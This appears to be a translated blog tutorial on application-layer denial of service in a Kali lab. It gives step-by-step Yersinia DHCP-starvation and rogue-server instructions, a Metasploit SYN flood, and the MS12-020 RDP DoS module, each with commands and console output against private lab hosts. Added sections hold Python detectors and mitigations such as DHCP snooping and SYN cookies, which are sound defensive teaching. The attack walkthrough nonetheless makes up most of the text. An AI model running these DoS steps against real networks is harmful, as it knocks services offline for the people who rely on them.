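Application-Layer Denial-of-Service Attacks
This article uses DHCP and HTTP as examples (the traditional web protocol is not covered in detail here).
Environment: Kali 2021
DHCP: Yersinia
Open the graphical interface: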
yersinia -G
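Select Launch attack.
Under DHCP, select the second option, sending DISCOVER packet.
sending RAW packet: sends raw packets
sending DISCOVER packet: sends IP address request packets that take up every available IP address, causing a denial of service
creating DHCP rogue server: creates a fake DHCP server for users to connect to, so that the real DHCP server cannot do its job
sending RELEASE packet: sends IP release requests to the DHCP server, invalidating all IP addresses currently in use
Click OK.
Now connect a phone to the network: it shows that it is obtaining an IP address and stays stuck there.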
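Seen from the DHCP server, the DISCOVER option above shows up as a burst of requests from many client MAC addresses that were never seen before. The following is an added example, not part of the original post: a sliding-window detector over DHCP server log lines. The log layout (ISO timestamp followed by an ISC dhcpd style message), the function name and both thresholds are assumptions.

```python
import re
from collections import deque
from datetime import datetime

# Constructed sample (not captured traffic): 60 DISCOVERs from 60 different
# MAC addresses within 6 seconds, then one ordinary client five minutes later.
SAMPLE_LOG = "\n".join(
    [f"2021-06-01T10:00:{i // 10:02d} dhcpd: DHCPDISCOVER from "
     f"02:00:00:00:00:{i:02x} via eth0" for i in range(60)]
    + ["2021-06-01T10:05:00 dhcpd: DHCPDISCOVER from 3c:22:fb:10:20:30 via eth0",
       "2021-06-01T10:05:01 dhcpd: DHCPOFFER on 192.168.1.50 to 3c:22:fb:10:20:30 via eth0"]
)

DISCOVER_RE = re.compile(
    r"^(?P<ts>\S+) dhcpd(?:\[\d+\])?: DHCPDISCOVER from "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b", re.IGNORECASE)


def find_discover_bursts(log_text, window_s=10, max_macs=20):
    """Return (timestamp, distinct_macs) each time the number of distinct
    MACs sending DISCOVER within window_s seconds first exceeds max_macs."""
    window = deque()      # (time, mac) pairs still inside the sliding window
    alerts = []
    alerting = False      # suppress repeat alerts while one burst continues
    for line in log_text.splitlines():
        m = DISCOVER_RE.match(line)
        if not m:
            continue      # OFFER/REQUEST/ACK lines are ignored
        now = datetime.fromisoformat(m["ts"])
        window.append((now, m["mac"].lower()))
        while (now - window[0][0]).total_seconds() > window_s:
            window.popleft()
        distinct = len({mac for _, mac in window})
        if distinct > max_macs:
            if not alerting:
                alerts.append((m["ts"], distinct))
            alerting = True
        else:
            alerting = False
    return alerts


if __name__ == "__main__":
    for ts, count in find_discover_bursts(SAMPLE_LOG):
        print(f"{ts}: {count} distinct MACs sent DISCOVER within 10 s")
```

On the switch side, DHCP snooping with a per-port rate limit and port security that caps the number of MAC addresses per access port are the standard controls against this kind of pool exhaustion and against rogue DHCP servers.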
HTTP: Metasploit
Open Metasploit:
msfconsole
Search for DoS (denial-of-service) modules:
search dos
msf6 > search dos
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/http/cable_haunt_websocket_dos 2020-01-07 normal No "Cablehaunt" Cable Modem WebSocket DoS
1 auxiliary/dos/http/3com_superstack_switch 2004-06-24 normal No 3Com SuperStack Switch Denial of Service
2 auxiliary/dos/scada/igss9_dataserver 2011-12-20 normal No 7-Technologies IGSS 9 IGSSdataServer.exe DoS
3 exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent No Adobe PDF Escape EXE Social Engineering (No JavaScript)
4 auxiliary/dos/android/android_stock_browser_iframe 2012-12-01 normal No Android Stock Browser Iframe DOS
5 auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal No Apache Commons FileUpload and Apache Tomcat DoS
6 auxiliary/dos/http/apache_range_dos 2011-08-19 normal No Apache Range Header DoS (Apache Killer)
7 auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal No Apache Tomcat Transfer-Encoding Information Disclosure and DoS
8 auxiliary/dos/http/apache_mod_isapi 2010-03-05 normal No Apache mod_isapi Dangling Pointer
9 auxiliary/dos/windows/appian/appian_bpm 2007-12-17 normal No Appian Enterprise Business Suite 5.6 SP1 DoS
10 auxiliary/dos/mdns/avahi_portzero 2008-11-14 normal No Avahi Source Port 0 DoS
11 auxiliary/dos/dns/bind_tkey 2015-07-28 normal No BIND TKEY Query Denial of Service
12 auxiliary/dos/dns/bind_tsig_badtime 2020-05-19 normal No BIND TSIG Badtime Query Denial of Service
13 auxiliary/dos/dns/bind_tsig 2016-09-27 normal No BIND TSIG Query Denial of Service
14 auxiliary/dos/scada/beckhoff_twincat 2011-09-13 normal No Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS
15 auxiliary/dos/http/brother_debut_dos 2017-11-02 normal No Brother Debut http Denial Of Service
16 auxiliary/scanner/rdp/cve_2019_0708_bluekeep 2019-05-14 normal Yes CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
17 auxiliary/dos/http/canon_wireless_printer 2013-06-18 normal No Canon Wireless Printer Denial Of Service
18 auxiliary/admin/chromecast/chromecast_reset normal No Chromecast Factory Reset DoS
......
......
134 auxiliary/dos/http/ws_dos normal No ws - Denial of Service
Interact with a module by name or index. For example info 134, use 134 or use auxiliary/dos/http/ws_dos
msf6 >
Here auxiliary/dos/tcp/synflood is used to run a SYN denial-of-service attack against the target.
msf6 > search synflood
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/tcp/synflood normal No TCP SYN Flooder
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/dos/tcp/synflood
msf6 > use 0
msf6 auxiliary(dos/tcp/synflood) > options
Module options (auxiliary/dos/tcp/synflood):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
NUM no Number of SYNs to send (else unlimited)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port
SHOST no The spoofable source address (else randomizes)
SNAPLEN 65535 yes The number of bytes to capture
SPORT no The source port (else randomizes)
TIMEOUT 500 yes The number of seconds to wait for new data
msf6 auxiliary(dos/tcp/synflood) > set rhost 192.168.1.108
rhost => 192.168.1.108
First check whether 192.168.1.108 is reachable.
It is reachable, so run exploit.
msf6 auxiliary(dos/tcp/synflood) > exploit
[*] Running module against 192.168.1.108
[*] SYN flooding 192.168.1.108:80...
The target can no longer be accessed.
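On the target, a SYN flood like the one above leaves the listener's queue full of half-open connections in the SYN_RECV state, typically from many different source addresses. The following is an added example, not part of the original post: it counts those entries per listening socket from /proc/net/tcp text. It assumes the target is a little-endian Linux host; the function names and the limit of 32 are hypothetical.

```python
import socket
import struct
from collections import Counter, defaultdict

SYN_RECV = "03"  # kernel state code for a half-open (SYN received) connection


def _row(n, remote_hex, state):
    # One /proc/net/tcp row for local 192.168.1.108:80 (little-endian hex).
    return (f"{n:4d}: 6C01A8C0:0050 {remote_hex} {state} 00000000:00000000 "
            "00:00000000 00000000     0        0 0")


# Constructed sample, not read from a real host: 1 listener, 2 established
# connections and 40 half-open connections from 40 different source addresses.
SAMPLE_PROC_NET_TCP = "\n".join(
    ["  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode",
     "   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 0",
     _row(1, "6501A8C0:C001", "01"), _row(2, "6601A8C0:C002", "01")]
    + [_row(3 + i, f"{i + 1:02X}00000A:{0xC350 + i:04X}", SYN_RECV) for i in range(40)]
)


def decode(addr):
    """'6C01A8C0:0050' -> ('192.168.1.108', 80) on a little-endian host."""
    ip_hex, port_hex = addr.split(":")
    return socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16))), int(port_hex, 16)


def half_open_by_listener(proc_text):
    """Map (local_ip, local_port) -> (half-open count, distinct source IPs)."""
    counts, sources = Counter(), defaultdict(set)
    for line in proc_text.splitlines()[1:]:        # skip the header row
        fields = line.split()
        if len(fields) < 4 or fields[3] != SYN_RECV:
            continue                               # only half-open entries
        local = decode(fields[1])
        counts[local] += 1
        sources[local].add(decode(fields[2])[0])
    return {k: (counts[k], len(sources[k])) for k in counts}


def flooded(proc_text, limit=32):
    """Listeners whose half-open count exceeds limit (hypothetical threshold)."""
    return [k for k, (n, _) in half_open_by_listener(proc_text).items() if n > limit]


if __name__ == "__main__":
    print(half_open_by_listener(SAMPLE_PROC_NET_TCP))
```

On Linux, setting net.ipv4.tcp_syncookies=1 lets the kernel keep answering new connections once the SYN backlog is full, which is the usual host-side mitigation.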
MS12_020: Remote Desktop Protocol (RDP) vulnerability
msf6 > search ms12_020
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rdp/ms12_020_check normal Yes MS12-020 Microsoft Remote Desktop Checker
1 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal No MS12-020 Microsoft Remote Desktop Use-After-Free DoS
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf6 > use 1
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3389 yes The target port (TCP)
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > setg rhosts 192.168.1.106
rhosts => 192.168.1.106
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > exploit
[*] Running module against 192.168.1.106
[*] 192.168.1.106:3389 - 192.168.1.106:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.1.106:3389 - 192.168.1.106:3389 - 210 bytes sent
[*] 192.168.1.106:3389 - 192.168.1.106:3389 - Checking RDP status...
[-] 192.168.1.106:3389 - 192.168.1.106:3389 - RDP Service Unreachable
[*] Auxiliary module execution completed
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) >
Use the vulnerability check module:
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > search ms12_020
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/rdp/ms12_020_check normal Yes MS12-020 Microsoft Remote Desktop Checker
1 auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal No MS12-020 Microsoft Remote Desktop Use-After-Free DoS
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > use 0
msf6 auxiliary(scanner/rdp/ms12_020_check) > options
Module options (auxiliary/scanner/rdp/ms12_020_check):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.106 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3389 yes Remote port running RDP (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/rdp/ms12_020_check) > setg threads 100
threads => 100
msf6 auxiliary(scanner/rdp/ms12_020_check) > run
[+] 192.168.1.106:3389 - 192.168.1.106:3389 - The target is vulnerable.
[*] 192.168.1.106:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
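It reports that the target can be attacked, but the attack itself does not succeed. I tried many times and did not find the cause.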